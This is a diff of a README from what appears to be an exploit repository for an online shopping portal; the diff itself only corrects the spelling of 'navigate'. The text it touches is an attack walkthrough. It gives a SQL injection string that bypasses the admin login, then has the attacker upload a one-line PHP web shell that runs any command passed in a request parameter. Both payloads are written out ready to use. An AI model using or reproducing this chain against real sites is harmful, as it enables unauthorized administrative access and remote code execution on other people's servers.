d3duct1v/Online-Shopping-Portal-3.1-Interactive-RCE/README.md

 ## Authentication Bypass

-Navagate to the Admin login page: `http://<site>/shopping/admin`
+Navigate to the Admin login page: `http://<site>/shopping/admin`
 * Username: `'OR 1=1'--`
 * Password: whatever

 ## File upload vulnerability

-After bypassing the authentication navagate to the "Add a new product" \
+After bypassing the authentication navigate to the "Add a new product" \
 Here insert whatever data into the fields until the picture. \
 The image file should be a php file with the command execution such the following:
   1. `<?php $exe = shell_exec($_REQUEST['cmd']); echo $exe; ?>`